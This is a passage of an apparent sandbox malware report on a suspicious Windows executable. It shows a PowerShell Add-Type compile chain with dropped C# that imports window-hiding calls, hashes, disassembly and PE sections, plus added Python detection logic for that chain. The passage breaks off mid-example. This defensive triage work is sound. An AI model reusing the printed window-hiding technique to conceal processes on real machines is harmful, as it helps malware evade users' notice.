                                                                                                                                                  SHA-256:2C058658252D0F5A4613DC846D56329797E86033E3C61B9B68537AE167000072
                                                                                                                                                  SHA-512:70AD464F11597E9677A757C59A79A27650487D0F59CBB35D88E9775236E2DBF3CB78413B10EAC3E9A33E2CBA7FB1FB85EF7755B1D25E1C7D9513615EA4DAF152
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:. using System;.. using System.Runtime.InteropServices;.... public class Win32 {.. [DllImport("user32.dll")].. public static extern IntPtr GetForegroundWindow();.... [DllImport("user32.dll")].. [return: MarshalAs(UnmanagedType.Bool)].. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.. }
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):371
                                                                                                                                                  Entropy (8bit):5.210776906296263
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fZVUzxs7+AEszI923fZh9n:p37Lvkmb6Kz/UWZE2r9n
                                                                                                                                                  MD5:A0DC6A6079BD848345C6F5E483ADC8D4
                                                                                                                                                  SHA1:7BD165479F63DB7304136AD710EF0CA721D7FF10
                                                                                                                                                  SHA-256:2968E71C1C0EE777B15D76BC45C1A392B51BB4EB10DB8701FE8DD0E7570B10F6
                                                                                                                                                  SHA-512:41C0192F3D81125BE0799881458732912F4817A6D26583CD426BC9AF8E803478EEA2D9A4345987C2291D79F7C6900BA1204F203A79EFB3A43337FD1A090E26F2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.0.cs"
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.9189758085688093
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGS7e5GIYq/dudQ8OUxkjvtkZfy908NoVWI+ycuZhNnoakSE9PNnq:65InudjxijOJy90Yl1uloa3Uq
                                                                                                                                                  MD5:FACA41537876BFB3C57CCC666C383B2A
                                                                                                                                                  SHA1:EC5BEACBDE950E78B61A01C0201AF57D9BF15AF4
                                                                                                                                                  SHA-256:A9DDE2BA730F709E507E70007EC60E5E606EA0781D3EC73A1CB0AEF6A67A93B8
                                                                                                                                                  SHA-512:B2E7E7028964848733289D9B940596A889544D2E276A691755D342BB350D8FA27795EAFDF244B8FF50316FEF9BC268D1941EA04B6455288D568C9F220E7D2537
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^vg...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S.......*.....3.....!.....4.......H.........................
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):872
                                                                                                                                                  Entropy (8bit):5.300650136629573
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KMoId3ka6KzNE2r9uKax5DqBVKVrdFAMBJTH:dokka6aNE2r9uK2DcVKdBJj
                                                                                                                                                  MD5:493E01DADE41B80BB4521AC8951D357F
                                                                                                                                                  SHA1:D65B258E175AF6756B6F55B9D970E1A44189462B
                                                                                                                                                  SHA-256:3B56735A252039DF6DF9FE756627AEDE226C72C5880F9E0E2421F93A8811B2E6
                                                                                                                                                  SHA-512:7F8264F9EBC7C67BC3F1D1A203855BAFFBECF0522E2C117CA49F41841848CA5CA0A2B68762BF19D01B47AD6D28F668F175260FD76B2596B29E79D781F4AA01C7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.1229792038504645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryaFak7YnqqRqPN5Dlq5J:+RI+ycuZhNgakSMPNnqX
                                                                                                                                                  MD5:7178CA7DB3AA58CC0E3A7F227F81C7DE
                                                                                                                                                  SHA1:1D95D38A287C21282C44F820FA56E4AC805AA322
                                                                                                                                                  SHA-256:710A61160B666E2FF11EAC7EE9BBD2CCA69B716BDAD5B8AC27E818E541C43DF6
                                                                                                                                                  SHA-512:D8A58F5883E0A704A1B757A637DCE261D2CC037D6B5A1966F252C88D4C835C873E70431E5F084A73BA87E67BE092648DE4E9176AB29226827B749BE515490D46
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.b.3.v.2.t.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.2.b.3.v.2.t.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):353
                                                                                                                                                  Entropy (8bit):4.82408068685792
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:gCsHS6yqVPuM/sq2SRaqK4LovyFwM/sezhkKwGButFi2SRkoSoOD9:gC4JTDfei7krW0FU9O9
                                                                                                                                                  MD5:379570600F5439DDA873EDA8F0CE4A79
                                                                                                                                                  SHA1:2023B772101AFF5B12AB53F24A69742A4B9C394F
                                                                                                                                                  SHA-256:2C058658252D0F5A4613DC846D56329797E86033E3C61B9B68537AE167000072
                                                                                                                                                  SHA-512:70AD464F11597E9677A757C59A79A27650487D0F59CBB35D88E9775236E2DBF3CB78413B10EAC3E9A33E2CBA7FB1FB85EF7755B1D25E1C7D9513615EA4DAF152
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:. using System;.. using System.Runtime.InteropServices;.... public class Win32 {.. [DllImport("user32.dll")].. public static extern IntPtr GetForegroundWindow();.... [DllImport("user32.dll")].. [return: MarshalAs(UnmanagedType.Bool)].. public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.. }
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):371
                                                                                                                                                  Entropy (8bit):5.257476551094234
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f+TmV0mD+zxs7+AEszI923f+TmV0mP:p37Lvkmb6Kz90c+WZE290G
                                                                                                                                                  MD5:0F19088A0071F778E46A51B0C3BE55F8
                                                                                                                                                  SHA1:66B1D544E4D6C0C4946EBB7754D719E154D590AC
                                                                                                                                                  SHA-256:BCD7B818953882F25936A9D28D2AB7A315AA513337916BB8C5C8A8A5DC722F71
                                                                                                                                                  SHA-512:089EFDDF89899311B727CA1E14F45A0BB8F98188F79F0E72E910C8F1ED12BA2796FF22521B61F02C9419C34FCEBFC2F06BFC005880EA16FC380721552D0913FB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.0.cs"
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.9202395866073805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSJ5GIYq/dudQ8OZAmGxkjvtkZfq9M78NoVWI+ycuZhNgakSMPNnq:6iInudjVijOJq9M7Yl1ulga3cq
                                                                                                                                                  MD5:DC65FCDAB4B20B7CA4E069DAC8E52141
                                                                                                                                                  SHA1:BFDC7FFA6A79D5ED9F753E9D827A65231A3D038C
                                                                                                                                                  SHA-256:3441D9BD91542289222748B31C703B28499E26D98A6871FBCD10F91E7CF9C0D7
                                                                                                                                                  SHA-512:672CB11F7853694D1829004627DE041DD27B9C9FDA7A5960EADDF33CC522F1C7A007C21E06C76E94E3C56119D914BBBAC2AE6604FEA2E43338E854D706FD23D7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^vg...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...<...#~......,...#Strings............#US.........#GUID.......T...#Blob...........G5........%3................................................................-.&...x.Y.....Y.................Y.................................... 4............ H.....P ......S...... ..................S...!.S. .).S...1.S.%...S.......*.....3.....!.....4.......H.........................
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):872
                                                                                                                                                  Entropy (8bit):5.327698957460308
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:KMoId3ka6Kz90c/E290HKax5DqBVKVrdFAMBJTH:dokka6a9jE29+K2DcVKdBJj
                                                                                                                                                  MD5:524A6EBF97ADD3A770C1865BDE8FD62C
                                                                                                                                                  SHA1:9CB753D2A635EFDDD505A41A26C36A760168E87A
                                                                                                                                                  SHA-256:3B94411FC235672ECAE846C579D8F1CD5395711C440C0C7B8F494A57434D973F
                                                                                                                                                  SHA-512:88C61A81FE8CE2D3CE38DAE0EC284F49EA2278C178C074A9C2890B870A77A8DA762D73498E2CFFAABF32484CF8FF671B46ED205F3AD420E32CB10DC9A3306A3C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
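The two groups of dropped files above are the complete artifact set of a PowerShell `Add-Type` compilation: powershell.exe writes `<token>.0.cs` and `<token>.cmdline` into `%LOCALAPPDATA%\Temp\<token>\`, launches csc.exe with `/t:library`, `/out:<token>.dll` and a reference to System.Management.Automation.dll, and csc.exe leaves behind the `.dll`, the `.res` version-info stub and the `.out` compiler transcript. The compiled class only imports `GetForegroundWindow` and `ShowWindow` from user32.dll, the pair normally used to hide the running console window; the PowerShell that calls them is not among these records, so that use is inferred, not shown. The detection logic below is an added example, not part of the Joe Sandbox report or the sample: it parses csc.exe command lines of the recorded shape, scores the markers that separate an Add-Type compile in Temp from an ordinary build, and flags the window-hiding P/Invoke in the dropped source. The csc.exe command line and the C# source are copied from the at4aznwk records above; the MSBuild parent path and the benign build line are constructed for contrast.

```python
"""Detect the PowerShell Add-Type -> csc.exe compile chain from process events.

Added example for this report, not part of the Joe Sandbox output or the sample.
"""
import re
from dataclasses import dataclass, field

# Paths under ...\AppData\Local\Temp\... or ...\Windows\Temp\... (case-insensitive).
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# Add-Type scratch naming seen in the records: <token>\<token>.0.cs -> <token>\<token>.dll
# with an 8-character random token (heuristic derived from the dropped files above).
ADDTYPE_SRC_RE = re.compile(r"^(?P<token>[a-z0-9]{8})\.0\.cs$", re.IGNORECASE)


@dataclass
class CscInvocation:
    parent_image: str
    target: str = ""
    out_path: str = ""
    references: list = field(default_factory=list)
    sources: list = field(default_factory=list)


def tokenize(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted spans (even with spaces) as one token."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def parse_csc(cmdline: str, parent_image: str) -> CscInvocation:
    """Pull /t(arget), /out, /R(eference) and source-file arguments out of a csc.exe line."""
    inv = CscInvocation(parent_image=parent_image.lower())
    for tok in tokenize(cmdline):
        if tok.lower().endswith("csc.exe"):
            continue                      # the compiler image itself
        if not tok.startswith("/"):
            inv.sources.append(tok)       # positional arguments are source files
            continue
        opt, _, val = tok[1:].partition(":")
        opt = opt.lower()
        if opt in ("t", "target"):
            inv.target = val.lower()
        elif opt == "out":
            inv.out_path = val
        elif opt in ("r", "reference"):
            inv.references.append(val)
        # /utf8output, /debug-, /optimize+, /warnaserror carry no signal and are ignored
    return inv


def addtype_indicators(inv: CscInvocation) -> list:
    """Names of every Add-Type marker present; an empty list means it looks like a normal build."""
    hits = []
    if inv.parent_image.endswith(("powershell.exe", "pwsh.exe")):
        hits.append("parent_is_powershell")
    if TEMP_DIR_RE.search(inv.out_path) or any(TEMP_DIR_RE.search(s) for s in inv.sources):
        hits.append("compiles_in_temp")
    if any(r.lower().endswith("system.management.automation.dll") for r in inv.references):
        hits.append("references_powershell_runtime")
    if inv.target == "library" and inv.out_path and inv.sources:
        out_dir, _, out_file = inv.out_path.rpartition("\\")
        m = ADDTYPE_SRC_RE.match(inv.sources[0].rpartition("\\")[2])
        if (m and out_file.lower() == m["token"].lower() + ".dll"
                and out_dir.rpartition("\\")[2].lower() == m["token"].lower()):
            hits.append("addtype_scratch_naming")
    return hits


def is_addtype_compile(cmdline: str, parent_image: str) -> bool:
    """Alert rule: a PowerShell parent plus at least two of the other three markers."""
    hits = addtype_indicators(parse_csc(cmdline, parent_image))
    return "parent_is_powershell" in hits and len(hits) >= 3


def window_hiding_pinvoke(csharp_source: str) -> bool:
    """Flag C# handed to Add-Type that imports the user32 pair used to hide the console window."""
    return ('DllImport("user32.dll")' in csharp_source
            and "GetForegroundWindow" in csharp_source
            and "ShowWindow" in csharp_source)


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# csc.exe command line as recorded in the at4aznwk .out file above.
PAGE_CMDLINE = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output '
    r'/R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
    r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" '
    r'/out:"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.dll" /debug- /optimize+ '
    r'/warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.0.cs"'
)
# Contents of the dropped at4aznwk.0.cs, whitespace restored from the preview above.
PAGE_SOURCE = """using System;
using System.Runtime.InteropServices;

public class Win32 {
    [DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();

    [DllImport("user32.dll")]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
}"""
# Constructed benign contrast (not from the report): an MSBuild-driven build outside Temp.
MSBUILD_IMAGE = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
BENIGN_CMDLINE = (r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe '
                  r'/out:"C:\src\App\bin\App.exe" /R:"System.dll" "C:\src\App\Program.cs"')

if __name__ == "__main__":
    print(addtype_indicators(parse_csc(PAGE_CMDLINE, PS_IMAGE)))
    print(is_addtype_compile(PAGE_CMDLINE, PS_IMAGE), is_addtype_compile(BENIGN_CMDLINE, MSBUILD_IMAGE))
    print(window_hiding_pinvoke(PAGE_SOURCE))
```

Requiring the PowerShell parent as well as two further markers keeps legitimate `Add-Type` use by administrators visible in the indicator list without alerting on a csc.exe line merely because it lives under Temp; the scratch-naming check is a heuristic taken from these two records and should be treated as corroborating, not sufficient, evidence.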
                                                                                                                                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Entropy (8bit):6.810579722471848
                                                                                                                                                  TrID:
                                                                                                                                                  • Win64 Executable Console (202006/5) 87.25%
                                                                                                                                                  • Visual Basic Script (13500/0) 5.83%
                                                                                                                                                  • Win64 Executable (generic) (12005/4) 5.19%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.87%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.86%
                                                                                                                                                  File name:dGhlYXB0Z3JvdXA=-free.exe
                                                                                                                                                  File size:34'433'319 bytes
                                                                                                                                                  MD5:ede0a1c97eaa446541dcfccd6fa9a6a7
                                                                                                                                                  SHA1:e578715a247461d460899af7302152c5daf4365e
                                                                                                                                                  SHA256:5a94644716cf1ab8c197ecad93562924c3bfb36224b8c0b68e26a252f3e713d8
                                                                                                                                                  SHA512:52ab94a2df444225f84664c8e6039a91efd04141ba0354f8e370144a69340be08406b0efd12943f9963524dfaf94a5d9acf4a835f156cacbf5e014f86e3d15cd
                                                                                                                                                  SSDEEP:393216:173Y9M927d8MFbOvYHJKOVLuLLna3W8oLPnJ:173Y9MwJ8M08KOoLG3W8oLJ
                                                                                                                                                  TLSH:49777C03BA8618A9D09DC474834B46639B213CDB1B39B9FF25D935252F7EAF05B3A314
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y5.h.T.;.T.;.T.;.?.:;T.;.?.:.T.;.?.:.T.;...;.T.;.%.:,T.;.%.:.T.;.%.:.T.;.?.:.T.;.T.;.T.;.&.:.T.;.T.;.V.;.&.:.T.;.&&;.T.;.&.:.T.
                                                                                                                                                  Icon Hash:13696df8f8f8924c
                                                                                                                                                  Entrypoint:0x14152fd70
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                  Subsystem:windows cui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x5FEC9DFF [Wed Dec 30 15:34:23 2020 UTC]
                                                                                                                                                  TLS Callbacks:0x4085d620, 0x1
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:6
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:6
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f89058cc20f309b3f79572b824dcfee6
Instruction (entrypoint disassembly). Note: this listing decodes the x64 entry code as 32-bit, so the REX prefix bytes show up as spurious dec eax / dec ebp / dec ecx / dec esp / inc eax / inc ecx / inc ebp and byte 0x63 as arpl instead of movsxd; for example dec eax; sub esp, 28h is sub rsp, 28h and dec eax; mov ecx, edx is mov rcx, rdx. Read the addresses and control flow, not the register names.
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  call 00007F0E64D8CA28h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  jmp 00007F0E64D8C287h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  dec eax
                                                                                                                                                  sub esp, 28h
                                                                                                                                                  dec ebp
                                                                                                                                                  mov eax, dword ptr [ecx+38h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  call 00007F0E64D8C422h
                                                                                                                                                  mov eax, 00000001h
                                                                                                                                                  dec eax
                                                                                                                                                  add esp, 28h
                                                                                                                                                  ret
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  inc ebp
                                                                                                                                                  mov ebx, dword ptr [eax]
                                                                                                                                                  dec eax
                                                                                                                                                  mov ebx, edx
                                                                                                                                                  inc ecx
                                                                                                                                                  and ebx, FFFFFFF8h
                                                                                                                                                  dec esp
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  inc ecx
                                                                                                                                                  test byte ptr [eax], 00000004h
                                                                                                                                                  dec esp
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  je 00007F0E64D8C425h
                                                                                                                                                  inc ecx
                                                                                                                                                  mov eax, dword ptr [eax+08h]
                                                                                                                                                  dec ebp
                                                                                                                                                  arpl word ptr [eax+04h], dx
                                                                                                                                                  neg eax
                                                                                                                                                  dec esp
                                                                                                                                                  add edx, ecx
                                                                                                                                                  dec eax
                                                                                                                                                  arpl ax, cx
                                                                                                                                                  dec esp
                                                                                                                                                  and edx, ecx
                                                                                                                                                  dec ecx
                                                                                                                                                  arpl bx, ax
                                                                                                                                                  dec edx
                                                                                                                                                  mov edx, dword ptr [eax+edx]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+10h]
                                                                                                                                                  mov ecx, dword ptr [eax+08h]
                                                                                                                                                  dec eax
                                                                                                                                                  mov eax, dword ptr [ebx+08h]
                                                                                                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                  je 00007F0E64D8C41Dh
                                                                                                                                                  movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                  and eax, FFFFFFF0h
                                                                                                                                                  dec esp
                                                                                                                                                  add ecx, eax
                                                                                                                                                  dec esp
                                                                                                                                                  xor ecx, edx
                                                                                                                                                  dec ecx
                                                                                                                                                  mov ecx, ecx
                                                                                                                                                  pop ebx
                                                                                                                                                  jmp 00007F0E64D8C426h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                  dec eax
                                                                                                                                                  cmp ecx, dword ptr [00A3D2C1h]
                                                                                                                                                  jne 00007F0E64D8C425h
                                                                                                                                                  dec eax
                                                                                                                                                  rol ecx, 10h
                                                                                                                                                  test cx, FFFFh
                                                                                                                                                  jne 00007F0E64D8C415h
                                                                                                                                                  ret
                                                                                                                                                  dec eax
                                                                                                                                                  ror ecx, 10h
                                                                                                                                                  jmp 00007F0E64D8CD3Ch
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  inc eax
                                                                                                                                                  push ebx
                                                                                                                                                  dec eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1f59890 | 0x68 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f598f8 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2060000 | 0x5084 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1f8c000 | 0xd2378 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2066000 | 0x1d308 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1d78fe8 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1d79180 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1d79040 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1560000 | 0x758 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x155e6a0 | 0x155e800 | 5dd19ef7ee076e0d89cacb281bd94528 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1560000 | 0x9fb1e4 | 0x9fb200 | cbad2020cf41a27fa6ee9ee4c10f33d8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1f5c000 | 0x2f9e0 | 0x11e00 | 51ecf0e0221c4fe5cc72d7c0d642f757 | False | 0.14178594842657344 | data | 2.77637946428186 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1f8c000 | 0xd2378 | 0xd2400 | 711bc06da1d5afe0a08f5b20756b06ed | False | 0.45217514491676575 | data | 6.880219414842573 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x205f000 | 0x94 | 0x200 | cb7fee38457a4f11371c8882f560f7b2 | False | 0.212890625 | data | 1.7840059761324978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2060000 | 0x5084 | 0x5200 | d1069b2a1391e8b52c913a236b75b64a | False | 0.9297351371951219 | data | 7.815647380372444 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2066000 | 0x1d308 | 0x1d400 | 4495e6c3818044f31171e2aea60d7122 | False | 0.20582932692307693 | data | 5.4835830175533795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
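Section-level triage checks over the section table above, as an added example that is not code from the Joe Sandbox report. The section rows, image base and entrypoint are transcribed from the report; the entropy threshold and the virtual-size/raw-size ratio are assumptions of this example, and the Shannon entropy helper is exercised on constructed bytes because the section contents themselves are not on the page.

```python
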